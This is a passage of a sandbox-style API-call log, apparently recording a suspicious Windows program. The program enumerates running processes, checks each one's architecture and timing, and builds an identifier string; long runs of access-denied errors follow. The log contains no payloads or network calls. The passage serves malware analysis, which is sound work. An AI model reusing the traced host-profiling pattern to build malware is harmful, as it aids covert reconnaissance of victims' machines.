	[0096.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0096.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0096.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0096.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0096.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0096.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0096.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0096.872] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.872] CloseHandle (hObject=0x248) returned 1
	[0096.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0096.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0096.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x6590a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0096.873] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.873] CloseHandle (hObject=0x248) returned 1
	[0096.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x658d48, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0096.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0096.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fea8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0096.873] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.873] CloseHandle (hObject=0x248) returned 1
	[0096.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fe90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0096.874] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.874] CloseHandle (hObject=0x248) returned 1
	[0096.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0096.874] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.874] CloseHandle (hObject=0x248) returned 1
	[0096.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0096.874] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.874] CloseHandle (hObject=0x248) returned 1
	[0096.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x658f08, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0096.875] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.875] CloseHandle (hObject=0x248) returned 1
	[0096.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0096.875] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.875] CloseHandle (hObject=0x248) returned 1
	[0096.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0096.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0096.875] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.875] CloseHandle (hObject=0x248) returned 1
	[0096.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0096.876] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.876] CloseHandle (hObject=0x248) returned 1
	[0096.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0096.876] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.876] CloseHandle (hObject=0x248) returned 1
	[0096.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x6590c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0096.876] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.876] CloseHandle (hObject=0x248) returned 1
	[0096.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x658f48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0096.877] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.877] CloseHandle (hObject=0x248) returned 1
	[0096.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ae08, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0096.877] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.877] CloseHandle (hObject=0x248) returned 1
	[0096.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x658f88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0096.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0096.877] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.877] CloseHandle (hObject=0x248) returned 1
	[0096.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658a60, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0096.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0096.878] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.878] CloseHandle (hObject=0x248) returned 1
	[0096.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658da8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0096.878] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.878] CloseHandle (hObject=0x248) returned 1
	[0096.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0096.878] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.878] CloseHandle (hObject=0x248) returned 1
	[0096.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0096.879] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.879] CloseHandle (hObject=0x248) returned 1
	[0096.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658d48, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0096.879] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.879] CloseHandle (hObject=0x248) returned 1
	[0096.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x658f48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0096.879] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.879] CloseHandle (hObject=0x248) returned 1
	[0096.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0096.880] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.880] CloseHandle (hObject=0x248) returned 1
	[0096.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0096.880] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.880] CloseHandle (hObject=0x248) returned 1
	[0096.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658920, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0096.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0096.880] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.880] CloseHandle (hObject=0x248) returned 1
	[0096.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0096.881] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.881] CloseHandle (hObject=0x248) returned 1
	[0096.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fe90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0096.881] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.881] CloseHandle (hObject=0x248) returned 1
	[0096.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x6590a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0096.881] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.881] CloseHandle (hObject=0x248) returned 1
	[0096.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0096.882] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.882] CloseHandle (hObject=0x248) returned 1
	[0096.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x6590c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0096.882] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.882] CloseHandle (hObject=0x248) returned 1
	[0096.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0096.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0096.882] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.882] CloseHandle (hObject=0x248) returned 1
	[0096.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x6589e8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0096.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.883] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.883] CloseHandle (hObject=0x248) returned 1
	[0096.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.883] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetLastError () returned 0x5
	[0096.884] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.884] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0096.884] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.885] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
	[0096.886] GetLastError () returned 0x5
